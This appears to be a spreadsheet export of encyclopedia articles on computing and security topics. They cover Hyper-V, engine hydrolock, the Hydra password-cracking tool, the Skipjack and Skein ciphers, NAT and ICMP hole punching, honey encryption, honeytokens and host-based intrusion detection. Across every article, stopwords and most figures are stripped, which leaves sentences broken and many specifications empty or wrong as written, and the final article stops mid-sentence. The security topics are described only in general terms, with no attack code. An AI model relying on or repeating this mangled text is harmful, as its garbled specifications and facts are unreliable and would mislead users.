requirements hyper-v role available x86-64 variants standard, enterprise datacenter editions windows server 2008 later, well pro, enterprise education editions windows later. windows server, installed regardless whether installation full core installation. addition, hyper-v made available part hyper-v server operating system, freeware edition windows server. either way, host computer needs following. following technologies: x86-64 hardware-assisted virtualization (intel vt-x amd-v) second level address translation windows server 2012 later) least memory, addition assigned guest machinethe amount memory assigned virtual machines depends operating system: windows server 2008 standard supports memory running vms, plus host windows server 2008 standard supports enterprise datacenter editions support hyper-v server 2008 supports windows server 2012 supports tb.the number cpus assigned virtual machine also depends windows server 2008 2008 support cpus applies hyper-v server 2008 windows server 2012 supports cpus vmthere also maximum number concurrently active virtual machines. windows server 2008 2008 support server; hyper-v server 2008 supports windows server 2012 supports 1024 server; applies hyper-v server 2012 windows server 2016 supports 8000 cluster node supported guests windows server 2008 following table lists supported guest operating systems windows server 2008 sp1. fedora unsupported; however, reported run.third-party support freebsd later guests provided partnership netapp citrix. this includes emulated paravirtualized modes operation, well several hyperv integration services.desktop virtualization (vdi) products third-party companies (such quest software vworkspace, citrix xendesktop, systancia applidis fusion ericom powerterm webconnect) provide ability host centrally manage desktop virtual machines data center giving users full desktop experience. guest operating systems enlightened hypervisor-aware kernel windows server 2008 later server versions, windows vista later clients offerings citrix xenserver novell able host resources better since drivers guests communicate vsps directly vmbus. non-"enlightened" operating systems emulated i/o; however, integration components (which include drivers) available windows server 2003 sp2, windows vista linux achieve better performance. linux support july 2009, microsoft submitted hyper-v drivers inclusion linux kernel terms gpl. microsoft required submit code discovered incorporated hyper-v network driver gpl-licensed components statically linked closed-source binaries. kernels beginning 2.6.32 include inbuilt hyper-v paravirtualization support improves performance virtual linux guest systems windows host environment. hyper-v provides basic virtualization support linux guests box. paravirtualization support requires installing linux integration components satori inputvsc drivers. xen-enabled linux guest distributions also paravirtualized hyper-v. 2013 microsoft officially supported suse linux enterprise server sp1/sp2 (x86 x64) manner, though xen-enabled linux able run. february 2008, microsoft signed virtualization pact hypervisor interoperability respective server operating systems, enable enterprise linux officially supported hyper-v. windows server 2012 hyper-v windows server 2012 windows server 2012 changes support list follows: hyper-v windows server 2012 adds support windows cpus) windows server 2012 cpus); hyper-v windows server 2012 adds support windows cpus) windows server 2016 cpus). minimum supported version centos 6.0. minimum supported version enterprise linux 5.7. maximum number supported cpus windows server linux operating systems increased four windows server 2012 hyper-v windows server 2012 added generation backward compatibility hyper-v, like microsoft virtual server windows virtual saves guest single virtual hard disk file. supports older .vhd format, well newer .vhdx. older .vhd files virtual server 2005, virtual 2004 virtual 2007 copied used hyper-v, virtual machine integration software (equivalents hyper-v integration services) must removed virtual machine. after migrated guest configured started using hyper-v, guest detect changes (virtual) hardware. installing "hyper-v integration services" installs five services improve performance, time adding guest video network card drivers. limitations audio hyper-v virtualize audio hardware. before windows windows server 2012 possible work around issue connecting virtual machine remote desktop connection network connection audio redirection feature. windows windows server 2012 enhanced session mode provides redirection without network connection. optical drives pass-through optical drives virtualized guest read-only. officially hyper-v support host/root operating system's optical drives pass-through guest vms. result, burning discs, audio cds, video cd/dvd-video playback supported; however, workaround exists using iscsi protocol. setting iscsi target host machine optical drive talked standard microsoft iscsi initiator. microsoft produces iscsi target software alternative third party products used. vt-x/amd-v handling hyper-v uses vt-x intel amd-v virtualization. since hyper-v native hypervisor, long installed, third-party software cannot vt-x amd-v. instance, intel haxm android device emulator (used android studio microsoft visual studio) cannot hyper-v installed. client operating systems skus windows 8.1, pro, enterprise, education, come special version hyper-v called client hyper-v. features added version windows server 2012 windows server 2012 introduced many features hyper-v. hyper-v extensible virtual switch network virtualization multi-tenancy storage resource pools .vhdx disk format supporting virtual hard disks large power failure resiliency virtual fibre channel offloaded data transfer hyper-v replica cross-premises connectivity cloud backup windows server 2012 with windows server 2012 microsoft introduced another features. shared virtual hard disk storage quality service generation virtual machine enhanced session mode automatic virtual machine activation windows server 2016 hyper-v windows server 2016 windows 1607 adds nested virtualization (intel processors only, host guest instances hyper-v must windows server 2016 windows later) discrete device assignment (dda), allowing direct pass-through compatible express devices guest virtual machines windows containers achieve isolation level rather level) shielded using remote attestation servers monitoring host resource utilization guests protection (limiting usage guests) windows server 2019 hyper-v windows server 2019 windows 1809 adds shielded virtual machines improvements including linux compatibility virtual machine encrypted networks vswitch receive segment coalescing dynamic virtual machine multi-queue vmmq) persistent memory support significant feature performance improvements storage spaces direct failover clustering also comparison platform virtualization software features windows virtual disk image microsoft open specification promise microsoft remote workplace virtual private server windows subsystem linux interface hyper-v windows admin center manager references further reading external links official website virtualization fabric design considerations guide hyper-v microsoft technet benchmarking hyper-v windows server 2008 archived 2017-04-23 wayback machine hyper-v architecture windows admin center manager</t>
  </si>
  <si>
    <t>Hydrolock</t>
  </si>
  <si>
    <t>hydrolock shorthand notation hydrostatic lock hydraulic lock) abnormal condition device designed compress mechanically restraining commonly reciprocating internal combustion engine, case article refers unless otherwise noted. hydrolock occurs volume liquid greater volume cylinder minimum (end piston's stroke) enters cylinder. since liquids nearly incompressible piston cannot complete travel; either engine must stop rotating mechanical failure must occur. symptoms damage engine hydrolocks speed, mechanical failure likely. common damage modes include bent broken connecting rods, fractured crank, fractured head, fractured block, crankcase damage, damaged bearings, combination these. forces absorbed interconnected components cause additional damage. physical damage metal parts manifest "crashing" "screeching" sound usually requires replacement engine substantial rebuild major components. internal combustion engine hydrolocks idling power conditions, engine stop suddenly immediate damage. case engine often purged unscrewing spark plugs injectors turning engine expel liquid combustion chambers restart attempted. depending liquid introduced engine, possibly restarted dried normal combustion heat, require work, flushing contaminated operating fluids replacing damaged gaskets. cylinder fills liquid engine turned off, engine refuse turn starting cycle attempted. since starter mechanism's torque normally much lower engine's operating torque, usually damage engine burn starter. engine drained restarted. corrosive substance water engine long enough cause rusting, extensive repairs required. amounts water significant enough cause hydrolock tend upset air/fuel mixture gasoline engines. water introduced slowly enough, effect power speed engine point hydrolock actually occurs cause catastrophic engine damage. causes special cases automotive hydrolock commonly occurs automobiles driving floods, either water level intake vehicle's speed excessive, creating tall wave. vehicle fitted cold intake mounted vehicle especially vulnerable hydrolocking driven standing water heavy precipitation. engine coolant entering cylinders various means (such blown head gasket) another common cause. excessive fuel entering (flooding) cylinders liquid form abnormal operating conditions also cause hydrolock. marine small boats outboard engines pwcs tend ingest water simply around during rollover, wave washes craft, engine hydrolock, though severe damage rare special intakes rotating inertia small marine engines. inboard marine engines different vulnerability often cooling water mixed exhaust gases header quiet engine. rusted exhaust headers lengthy periods turning starter cause water build exhaust line point back-flows exhaust manifold fills cylinders. turbocharged engines intercooler normally cooled water, rusts through, water ingested engine. diesel engines diesel engines susceptible hydrolock gasoline engines. higher compression ratios, diesel engines much smaller final combustion chamber volume, requiring much less liquid hydrolock. diesel engines also tend higher torque, rotating inertia, stronger starter motors gasoline engines. result diesel engine likely suffer catastrophic damage. radial inverted engines hydrolock common radial inverted engines (cylinders pointing downwards) engine sits long period. engine seeps gravity cylinder various means (through rings, valve guides, etc.) fill cylinder enough hydrolock seepage effect observed blue-white smoke commonly seen radial engine starts order prevent engine damage, universal practice ground crew pilot check hydrolock pre-flight inspection aircraft, typically slowly cranking propeller several turns, either hand using starter motor, make sure crankshaft cycles normally cylinders. steam engines hydraulic lock occur steam engines steam condensing back water. steam engine designs must small moment return stroke piston valves shut compressing remaining steam. water introduced boiler cold engine, steam condense water cool walls cylinders potentially hydrolock engine. this damaging internal combustion engines case steam locomotive dangerous broken connecting could puncture firebox boiler cause steam explosion. steam engines (with exception small model machines) always fitted cylinder drain cocks opened allow excess water steam escape warm references</t>
  </si>
  <si>
    <t>Hydra (software)</t>
  </si>
  <si>
    <t>hydra hydra) parallelized network login cracker built various operating systems like kali linux, parrot major penetration testing environments. hydra works using different approaches perform brute-force attacks order guess right username password combination. hydra commonly used penetration testers together programmes like crunch, cupp etc, used generate wordlists. hydra used test attacks using wordlists programmes created. hydra updated time services become supported. creator hydra publishes work repositories like github. supported protocols hydra supports many common login protocols like forms websites, ftp, smb, pop3, imap, mysql, vnc, http/s others. references external links official website</t>
  </si>
  <si>
    <t>Hydra (operating system)</t>
  </si>
  <si>
    <t>hydra (stylized hydra) early, discontinued, capability-based, object-oriented microkernel designed support wide range possible operating systems hydra created part c.mmp project carnegie-mellon university 1971.the name based ancient greek mythological creature hydra. hydra designed modular secure, intended flexible enough easy experimentation. system implemented programming language bliss. references levin, cohen, corwin, pollack, wulf, william (november 1975). "policy/mechanism separation hydra". proceedings fifth symposium operating systems principles. 132–140. doi:10.1145/800213.806531. wulf, william; cohen, corwin, jones, levin, pierson, pollack, (june 1974). hydra: kernel multiprocessor operating system. vol. 337–345. archived (pdf) original july 2007.</t>
  </si>
  <si>
    <t>High-voltage transformer fire barriers</t>
  </si>
  <si>
    <t>high-voltage transformer fire barriers, transformer firewalls, transformer ballistic firewalls, transformer blast walls, outdoor countermeasures cascading failures national electric grid. purpose barriers, like common fire barriers building construction, compartmentalisation transformer fires, compartmentalisation transformer bushing explosions―in fuel source fires explosions transformer oil. without compartmentalisation, ruptured transformer could start neighbouring transformer fire thus create domino effect would affect surrounding electric grid, particularly peak times. high-voltage transformer fire barriers typically located electrical substations, also attached buildings, valve halls manufacturing plants large electrical distribution systems, pulp paper mills. outdoor transformer fire barriers attached least side building referred wing walls. times, high-voltage transformers located immediately outside sometimes inside buildings, requiring higher fire-resistance ratings fire compartments building. voluntary recommendations nfpa primary north american document deals outdoor high-voltage transformer fire barriers nfpa 850. nfpa outlines outdoor oil-insulated transformers separated adjacent structures firewalls, spatial separation, approved means purpose limiting damage potential spread fire transformer failure. alternatives enhancements transformer fire barriers following used place addition transformer fire barriers, depending design goals. automatic fire suppression systems fire protection water spray systems used cool transformer prevent damage exposed radiation heat transfer fire involving released another transformer failed. transformer fast depressurization systems (fds) passive mechanical systems designed depressurize transformer milliseconds occurrence electrical fault. those systems minimize chance transformer tank rupture given minor fault effective major internal faults. alternatives mineral-based transformer transformer available different levels ignitability, including approved global. data sheet indicates different levels protection depending type fluid used. alternatives include, limited esters silicone oil. also fault cascading failure countermeasure critical infrastructure protection electric grid security electrical power distribution fire test firewall (construction) north american electric reliability corporation passive fire protection references</t>
  </si>
  <si>
    <t>SkyGrabber</t>
  </si>
  <si>
    <t>skygrabber software russian company skysoftware accepts input digital satellite tuner card hard drive recording. history used iraqi insurgents group kata'ib hezbollah intercept mq-1 predator drone video feeds, encrypted. encryption feeds removed performance reasons. also comparison packet analyzers satellite internet access references external links official site</t>
  </si>
  <si>
    <t>Skipjack (cipher)</t>
  </si>
  <si>
    <t>cryptography, skipjack block cipher—an algorithm encryption—developed u.s. national security agency (nsa). initially classified, originally intended controversial clipper chip. subsequently, algorithm declassified. history skipjack skipjack proposed encryption algorithm government-sponsored scheme escrow, cipher provided clipper chip, implemented tamperproof hardware. skipjack used encryption; escrow achieved separate mechanism known enforcement access field (leaf).the algorithm initially secret, regarded considerable suspicion many reason. declassified june 1998, shortly basic design principle discovered independently public cryptography community.to ensure public confidence algorithm, several academic researchers outside government called evaluate algorithm (brickell al., 1993). researchers found problems either algorithm evaluation process. moreover, report gave insight (classified) history development skipjack: [skipjack] representative family encryption algorithms developed 1980 part suite "type algorithms... skipjack designed using building blocks techniques date back forty years. many techniques related work evaluated world's accomplished famous experts combinatorics abstract algebra. skipjack's immediate heritage dates around 1980, initial design 1987...the specific structures included skipjack long evaluation history, cryptographic properties structures many prior years intense study formal process began 1987.in march 2016, nist published draft cryptographic standard longer certifies skipjack government applications. description skipjack uses 80-bit encrypt decrypt 64-bit data blocks. unbalanced feistel network rounds. designed used secured phones. cryptanalysis biham shamir discovered attack rounds within declassification, (with alex biryukov) extended rounds (but attack slightly faster exhaustive search) within months using impossible differential cryptanalysis.a truncated differential attack also published rounds skipjack cipher.a claimed attack full cipher published 2002, later paper attack designer co-author clarified 2009 attack full round cipher known. culture algorithm named skipjack forms part back-story brown's 1998 novel digital fortress. brown's novel, skipjack proposed public-key encryption standard, along back door secretly inserted lines cunning programming") would allowed decrypt skipjack using secret password thereby "read world's email". when details cipher publicly released, programmer greg hale discovers announces details backdoor. real life evidence suggest added back doors least algorithm; dual_ec_drbg random number algorithm contain backdoor accessible nsa. additionally, half-life modification dystopia, "encryption" program used cyberspace apparently uses skipjack blowfish algorithms. references further reading external links scan's entry cipher fip185 escrowed encryption standard</t>
  </si>
  <si>
    <t>Skein (hash function)</t>
  </si>
  <si>
    <t>skein cryptographic hash function five finalists nist hash function competition. entered candidate become sha-3 standard, successor sha-1 sha-2, ultimately lost nist hash candidate keccak.the name skein refers skein function intertwines input, similar skein yarn. history skein created bruce schneier, niels ferguson, stefan lucks, doug whiting, mihir bellare, tadayoshi kohno, callas jesse walker. skein based threefish tweakable block cipher compressed using unique block iteration (ubi) chaining mode, variant matyas–meyer–oseas hash mode, leveraging optional low-overhead argument-system flexibility. skein's algorithm reference implementation given public domain. functionality skein supports internal state sizes 256, 1024 bits, arbitrary output sizes.the authors claim cycles byte output size intel core 64-bit mode.the core threefish based function transforms 64-bit words using single addition, rotation constant xor. chaining mode combines input chaining value arbitrary length input string produces fixed size output. threefish's nonlinearity comes entirely combination addition operations exclusive-ors; s-boxes. function optimized 64-bit processors, skein paper defines optional features randomized hashing, parallelizable tree hashing, stream cipher, personalization, derivation function. cryptanalysis october 2010, attack combines rotational cryptanalysis rebound attack published. attack finds rotational collisions rounds threefish-256, rounds threefish-512. also affects skein hash function. this follow-up earlier attack published february, breaks rounds respectively.the skein team tweaked schedule constant round nist hash function competition, make attack less effective, even though believe hash would still secure without tweaks. examples skein hashes hash values empty string. skein-256-256("") c8877087da56e072870daa843f176e9453115929094c3a40c463a196c29bf7ba skein-512-256("") 39ccc4554a8b31853b9de7a1fe638a24cce6b35a55f2431009e18780335d2621 skein-512-512("") bc5b4c50925519c290cc634277ae3d6257212395cba733bbad37a4af0fa06af41fca7903d06564fea7a2d3730dbdb80c1f85562dfcc070334ea4d1d9e72cba7a even small change message (with overwhelming probability) result mostly different hash, avalanche effect. example, adding period sentence: skein-512-256("the quick brown jumps lazy dog") b3250457e05d3060b1a4bbc1428bc75a3f525ca389aeab96cfa34638d96e492a skein-512-256("the quick brown jumps lazy dog.") 41e829d7fca71c7d7154ed8fc8a069f274dd664ae0ed29d365d919f4e575eebb skein-512-512("the quick brown jumps lazy dog") 94c2ae036dba8783d0b3f7d6cc111ff810702f5c77707999be7e1c9486ff238a7044de734293147359b4ac7e1d09cd247c351d69826b78dcddd951f0ef912713 skein-512-512("the quick brown jumps lazy dog.") 658223cb3d69b5e76e3588ca63feffba0dc2ead38a95d0650564f2a39da8e83fbb42c9d6ad9e03fbfde8a25a880357d457dbd6f74cbcb5e728979577dbce5436 references external links official skein website (dead, wayback machine archive) bruce schneier's skein webpage implementations sparkskein implementation skein spark, proofs type-safety botan contains implementation skein-512 nskein .net implementation skein support block sizes pyskein skein module python php-skein-hash skein hash github digest::skein, implementation perl skeinfish implementation skein threefish (based version 1.3) java, scala, javascript implementations skein 512-512 (based version 1.3) java implementation skein (based version 1.1) implementation skein skerl, skein hash function erlang, nifs skein 512-512 implemented bash skein implemented haskell vhdl source code developed cryptographic engineering research group (cerg) george mason university skeinr skein implemented ruby fhreefish efficient implementation skein-256 8-bit atmel microcontrollers, meeting performance estimates outlined official specification</t>
  </si>
  <si>
    <t>HiperSocket</t>
  </si>
  <si>
    <t>hipersockets technology high-speed communications partitions server hypervisor. term commonly associated system later mainframes provide in-memory tcp/ip connections among lpars running several different operating systems, including z/os, z/vm, linux although applications perceive functional differences, hipersockets require less processing overhead either side connections, improving performance. since memory-based, operate memory speeds, reducing network latency improving end-user performance, especially complex applications would otherwise require multiple network hops fulfill requests. hipersockets also provide security benefits, especially memory key-protected mainframe, even without encryption, opportunity intercept network connection. moreover, hipersockets improve reliability availability network hubs, routers, adapters, wires break. main disadvantage hipersockets exist within single physical system, applicable among physical systems. server consolidation help applications hipersockets. also ziip external links eserver zseries hipersockets hipersockets implementation guide redbooks</t>
  </si>
  <si>
    <t>Hole punching (networking)</t>
  </si>
  <si>
    <t>hole punching sometimes punch-through) technique computer networking establishing direct connection parties behind firewalls behind routers network address translation (nat). punch hole, client connects unrestricted third-party server temporarily stores external internal address port information client. server relays client's information other, using information client tries establish direct connection; result connections using valid port numbers, restrictive firewalls routers accept forward incoming packets side. hole punching require knowledge network topology function. icmp hole punching, hole punching hole punching respectively internet control message, user datagram transmission control protocols. overview networked devices public globally accessible addresses create connections another easily. clients private addresses also easily connect public servers, long client behind router firewall initiates connection. however, hole punching form traversal) required establish direct connection clients reside behind different firewalls routers network address translation (nat). both clients initiate connection unrestricted server, notes endpoint session information including public port along private port. firewalls also note endpoints order allow responses server pass back through. server sends client's endpoint session information client, peer. each client tries connect peer specified address port peer's firewall opened server. connection attempt punches hole client's firewall endpoint becomes open receive response peer. depending network conditions, clients might receive connection request. successful exchange authentication nonce clients indicates completion hole punching procedure. examples voip products, online gaming applications, networking software hole punching. telephony software skype uses hole punching allow users communicate users audibly. fast-paced online multi-player games hole punching technique require users create permanent firewall pinhole order reduce network latency. applications hamachi zerotier utilize hole punching allow users connect directly subscribed devices behind firewalls. decentralized peer-to-peer file sharing software relies hole punching file distribution. requirements reliable hole punching requires consistent endpoint translation, multiple levels nats, hairpin translation. when outbound connection private endpoint passes firewall, receives public endpoint (public address port number), firewall translates traffic them. until connection closed, client server communicate public endpoint, firewall directs traffic appropriately. consistent endpoint translation reuses public endpoint given private endpoint, instead allocating public endpoint every connection. hairpin translation creates loopback connection private endpoints recognizes destination endpoint itself. this functionality necessary hole punching used within multiple-layered nat. also port knocking session initiation protocol universal plug play port control protocol external links traversal works references</t>
  </si>
  <si>
    <t>Honey encryption</t>
  </si>
  <si>
    <t>honey encryption type data encryption "produces ciphertext, which, decrypted incorrect guessed attacker, presents plausible-looking incorrect plaintext password encryption key." creators juels thomas ristenpart university wisconsin, developers encryption system, presented paper honey encryption 2014 eurocrypt cryptography conference. method protection brute-force attack involves repeated decryption random keys; equivalent picking random plaintexts space possible plaintexts uniform distribution. this effective even though attacker equally likely given plaintext, plaintexts extremely unlikely legitimate i.e. distribution legitimate plaintexts non-uniform. honey encryption defeats attacks first transforming plaintext space distribution legitimate plaintexts uniform. thus attacker guessing keys legitimate-looking plaintexts frequently random-looking plaintexts infrequently. this makes difficult determine correct guessed. effect, honey encryption "[serves] fake data response every incorrect guess password encryption key."the security honey encryption relies fact probability attacker judging plaintext legitimate calculated encrypting party) time encryption. this makes honey encryption difficult apply certain applications e.g. space plaintexts large distribution plaintexts unknown. also means honey encryption vulnerable brute-force attacks probability miscalculated. example, vulnerable known-plaintext attacks: attacker crib plaintext must match legitimate, able brute-force even honey encrypted data encryption take crib account. example encrypted credit card number susceptible brute-force attacks every string digits equally likely. number digits range though common. additionally, must valid last digit must match checksum. attacker also take account popularity various services: mastercard probably likely diners club carte blanche. honey encryption protect attacks first mapping credit card numbers larger space match likelihood legitimacy. numbers invalid iins checksums mapped (i.e. probability legitimacy). numbers large brands like mastercard visa large regions space, less popular brands smaller regions, etc. attacker brute-forcing encryption scheme would legitimate-looking credit card numbers brute-force, numbers would appear frequency attacker would expect real world. application juels ristenpart honey encryption protect data stored password manager services. juels stated "password managers tasty target criminals," worries criminals hold large collection encrypted password vaults could probably unlock many without much trouble." hristo bojinov, founder anfacto, noted "honey encryption could help reduce vulnerability. notes every type data easy protect way. authentication encryption system yield honeyed." references external links eurocrypt 2014 website</t>
  </si>
  <si>
    <t>Honeytoken</t>
  </si>
  <si>
    <t>field computer security, honeytokens honeypots computer systems. their value lies use, abuse. such, generalization ideas honeypot canary values often used stack protection schemes. honeytokens necessarily prevent tampering data, instead give administrator measure confidence data integrity. honeytokens fictitious words records added legitimate databases. they allow administrators track data situations normally able track, cloud based networks. data stolen, honey tokens allow administrators identify stolen leaked. three locations medical records, different honey tokens form fake medical records could added location. different honeytokens would records.if chosen unique unlikely ever appear legitimate traffic, also detected network intrusion-detection system (ids), alerting system administrator things would otherwise unnoticed. this case beyond merely ensuring integrity, reactive security mechanisms, actually prevent malicious activity, e.g. dropping packets containing honeytoken router. however, mechanisms pitfalls might cause serious problems honeytoken poorly chosen appeared otherwise legitimate network traffic, dropped. term first coined augusto paes barros 2003. uses honeytokens exist many forms, dead, fake account database entry would selected malicious queries, making concept ideally suited ensuring data integrity. particular example honeytoken fake email address used track mailing list stolen. also honeypot fictitious entry trap street references</t>
  </si>
  <si>
    <t>Honeywell Gent</t>
  </si>
  <si>
    <t>formerly gents' leicester, also known gents company limited, gent honeywell, established leicester, england, 1872 john thomas gent. century, company well-known manufacturer electrical equipment, particular electric clocks, used public buildings railway stations world. gent mainly produce fire detection alarm systems. products company also produced fire alarm systems, electric bells, transformers, telephones, signalling recording equipment, electrical parts aircraft communications radar equipment. company workforce several hundred height. some well-known fire alarm products include model 1102 manual call points, came small hammer attached chain. extremely loud warbler sounders used many schools across united kingdom. original warbler three selectable tones: warble, continuous intermittent also adjustable pitch speed dials. later models considerably quieter included addition sweep tone, without pitch speed controls. when gent warbler became popular 80s, companies protec also copied design. many warblers since become collectable items many scrapped replaced newer fire alarm systems. 2510 2511 sounders produced, latter common across many schools manufactured 2003. model 1500 sirens also often used older fire alarm systems, sounding similar raid sirens. current gent addressable protocol began development system 3400 control panel 1985. this protocol expanded cope features newer devices, still protocol, meaning system 3400 devices compatible brand-new gent vigilon plus control panel. gent manufactures many fire alarm devices. s-cubed range sounders options voice alarms en54 compliant visual alarm devices. s-quad smoke heat detector using advanced false alarm reduction technology options built-in voice sounder, en54 compliant visual alarm device (vad). s-quad used many buildings across globe. location main design manufacturing centre headquarters faraday works temple road, leicester; world company expanded nearby kibworth. premises london road also used time. early 1990s large building constructed hamilton area leicester buildings closed. takeovers 1981, gents' leicester taken international organisation chloride, known "chloride gent". 1982, company sold chloride electric group, known "gent limited". factory kibworth closed, jobs remained central leicester works. 1993, company acquired caradon/novar; 2005, taken honeywell, known "gent honeywell" since. still based leicester, company mostly involved fire detection alarm systems. references external links gent entry gracesguide.co.uk</t>
  </si>
  <si>
    <t>Single point of failure</t>
  </si>
  <si>
    <t>single point failure (spof) part system that, fails, stop entire system working. spofs undesirable system goal high availability reliability, business practice, software application, industrial system. overview systems made robust adding redundancy potential spofs. redundancy achieved various levels. assessment potential spof involves identifying critical components complex system would provoke total systems failure case malfunction. highly reliable systems rely individual component. instance, owner small tree care company woodchipper. chipper breaks, unable complete current cancel future jobs obtain replacement. owner tree care company spare parts ready repair wood chipper, case fails. higher level, second wood chipper bring site. finally, highest level, enough equipment available completely replace everything work site case multiple failures. computing fault-tolerant computer system achieved internal component level, system level (multiple machines), site level (replication). would normally deploy load balancer ensure high availability server cluster system level. high-availability server cluster, individual server attain internal component redundancy multiple power supplies, hard drives, components. system-level redundancy could obtained spare servers waiting take work another server fails. since data center often support center operations business logic, represents potential spof itself. thus, site level, entire cluster replicated another location, accessed case primary location becomes unavailable. this typically addressed part disaster recovery (resiliency) program. paul baran donald davies developed packet switching, part "survivable communications networks". such networks including arpanet internet designed single point failure. multiple paths points network allow points continue communicating other, packets "routing around" damage, even single failure particular path intermediate node. software engineering software engineering, bottleneck occurs capacity application computer system limited single component. bottleneck lowest throughput parts transaction path. performance engineering tracking bottlenecks (sometimes known spots sections code execute frequently i.e. highest execution count) called performance analysis. reduction usually achieved help specialized tools, known performance analyzers profilers. objective make particular sections code perform fast possible improve overall algorithmic efficiency. computer security vulnerability security exploit component compromise entire system. other fields concept single point failure also applied fields outside engineering, computers, networking, corporate supply chain management transportation management.design structures create single points failure include bottlenecks series circuits contrast parallel circuits). transportation, noted recent examples concept's recent application included nipigon river bridge canada, partial bridge failure january 2016 entirely severed road traffic eastern canada western canada several days located along portion trans-canada highway alternate detour route vehicles take; norwalk river railroad bridge norwalk, connecticut, aging swing bridge sometimes gets stuck opening closing, disrupting rail traffic northeast corridor line.the concept single point failure also applied fields intelligence. edward snowden talked dangers described "the single point failure" sole repository information. life-support systems component life-support system would constitute single point failure would required extremely reliable. also concepts redundancy duplication critical components increase reliability system factor measurement risk losing technical experts lusser's probability product series components service-level agreement official commitment service provider customer applications kill switch safety mechanism quickly shut system jesus slang term main rotor-retaining helicopters reliability engineering sub-discipline systems engineering emphasizes dependability safety engineering engineering discipline assures engineered systems provide acceptable levels safety dead man's switch equipment activates deactivates upon incapacitation operator literature achilles' heel critical weakness lead downfall spite overall strength hamartia protagonist's error greek dramatic theory references</t>
  </si>
  <si>
    <t>ICMP hole punching</t>
  </si>
  <si>
    <t>icmp hole punching technique employed network address translator (nat) applications maintaining internet control message protocol (icmp) packet streams traverse nat. traversal techniques typically required client-to-client networking applications internet involving hosts connected private networks, especially peer-to-peer voice internet protocol (voip) deployments. icmp hole punching establishes connectivity hosts communicating across network address translators either peer-to-peer client–server model. typically, third party hosts public transit network used establish port states used direct communications communicating hosts, however icmp hole punching requires third party involvement pass information nats exploiting nat's loose acceptance inbound icmp time exceeded packets.once icmp time exceeded packet reaches destination nat, arbitrary data packet expected allows packet reach destination server, allowing destination server obtain client's public address data stored packet client. overview currently method icmp hole punching hole punching without third party involvement (autonomous traversal) developed samy kamkar january 2010 released open source software pwnat, method later published ieee. according paper: proposed technique assumes client somehow learned current external (globally routable) address server's nat. idea enabling server learn client's address server periodically send message fixed, known address. simplest approach uses icmp echo request messages unallocated address, 1.2.3.4. since 1.2.3.4 allocated, icmp request routed routers without default route; icmp destination unreachable messages created routers ignored server. result messages sent 1.2.3.4, enable routing replies response request. connecting client fake reply. specifically, client transmit icmp message indicating ttl_expired. such message could legitimately transmitted internet router sender address would expected match server's target server listens (fake) icmp replies upon receipt initiates connection sender specified icmp reply. also hole punching (networking) port control protocol (pcp) hole punching hole punching references</t>
  </si>
  <si>
    <t>Host Identity Protocol</t>
  </si>
  <si>
    <t>host identity protocol (hip) host identification technology internet protocol (ip) networks, internet. internet main name spaces, addresses domain name system. separates end-point identifier locator roles addresses. introduces host identity (hi) name space, based public security infrastructure. host identity protocol provides secure methods multihoming mobile computing. networks implement host identity protocol, occurrences addresses applications eliminated replaced cryptographic host identifiers. cryptographic keys typically, necessarily, self-generated. effect eliminating addresses application transport layers decoupling transport layer internetworking layer (internet layer) tcp/ip.hip specified ietf working group. internet research task force (irtf) research group looks broader impacts hip. working group chartered produce requests comments "experimental" track, understood quality security properties match standards track requirements. main purpose producing experimental documents instead standards track ones unknown effects mechanisms applications internet large. references 4423 host identity protocol (hip) architecture (early "informational" snapshot) 5201 host identity protocol base (obsoleted 7401) 5202 using encapsulating security payload (esp) transport format host identity protocol (hip) (obsoleted 7402) 5203 host identity protocol (hip) registration extension (obsoleted 8003) 5204 host identity protocol (hip) rendezvous extension (obsoleted 8004) 5205 host identity protocol (hip) domain name system (dns) extension (obsoleted 8005) 5206 end-host mobility multihoming host identity protocol 5207 firewall traversal issues host identity protocol (hip) communication 6092 basic requirements ipv6 customer edge routers 7401 host identity protocol version (hipv2) (updated 8002) 7402 using encapsulating security payload (esp) transport format host identity protocol (hip) 8002 host identity protocol certificates 8003 host identity protocol (hip) registration extension 8004 host identity protocol (hip) rendezvous extension 8005 host identity protocol (hip) domain name system (dns) extension 8046 host mobility host identity protocol 8047 host multihoming host identity protocol 9028 native traversal mode host identity protocol also identifier/locator network protocol (ilnp) ipsec locator/identifier separation protocol (lisp) mobile (mip) proxy mobile ipv6 (pmipv6) references external links ietf working group irtf research group openhip wiki works infrahip site moved works simulation framework omnet++ tempered networks hip-based airwall family</t>
  </si>
  <si>
    <t>Host-based intrusion detection system comparison</t>
  </si>
  <si>
    <t>comparison host-based intrusion detection system components systems. free open-source software unix philosophy good hids composed multiple packages focusing specific aspect. proprietary software references external links debian security manual arch security wiki centos security wiki ubuntu security wiki</t>
  </si>
  <si>
    <t>Host-based intrusion detection system</t>
  </si>
  <si>
    <t>host-based intrusion detection system (hids) intrusion detection system capable monitoring analyzing internals computing system well network packets network interfaces, similar network-based intrusion detection system (nids) operates. this first type intrusion detection software designed, original target system mainframe computer outside interaction infrequent. overview host-based capable monitoring parts dynamic behavior state computer system, based configured. besides activities dynamically inspecting network packets targeted specific host (optional component software solutions commercially available), hids might detect program accesses resources discover that, example, word-processor suddenly inexplicably started modifying system password database. similarly hids might look state system, stored information, whether ram, file system, files elsewhere; check contents appear expected, e.g. changed intruders.one think hids agent monitors whether anything anyone, whether internal external, circumvented system's security policy. monitoring dynamic behavior many computer users encountered tools monitor dynamic system behaviour form anti-virus (av) packages. while programs often also monitor system state, spend time looking inside computer whether given program access particular system resources. lines become blurred here, many tools overlap functionality. some intrusion prevention systems protect buffer overflow attacks system memory enforce security policy. monitoring state principle operation hids depends fact successful intruders (hackers) generally leave trace activities. fact, intruders often want computer attacked, establish "ownership" installing software grant intruders future access carry whatever activity (keystroke logging, identity theft, spamming, botnet activity, spyware-usage etc.) envisage. theory, computer user ability detect modifications, hids attempts reports findings. ideally hids works conjunction nids, hids finds anything slips past nids. commercially available software solutions often correlate findings nids hids order find whether network intruder successful targeted host. most successful intruders, entering target machine, immediately apply best-practice security techniques secure system infiltrated, leaving backdoor open, intruders take computers. technique general hids uses database (object-database) system objects monitor usually (but necessarily) file system objects. hids could also check appropriate regions memory modified example, system call table linux, various vtable structures microsoft windows. object question hids usually remember attributes (permissions, size, modifications dates) create checksum kind md5, sha1 hash similar) contents, any. this information gets stored secure database later comparison (checksum database). alternate method hids would provide nids type functionality network interface (nic) level end-point (either server, workstation device). providing hids network layer advantage providing detailed logging source address) attack attack details, packet data, neither dynamic behavioral monitoring approach could see. operation installation time whenever monitored objects change legitimately hids must initialize checksum-database scanning relevant objects. persons charge computer security need control process tightly order prevent intruders making un-authorized changes database(s). such initialization thus generally takes long time involves cryptographically locking monitored object checksum databases worse. because this, 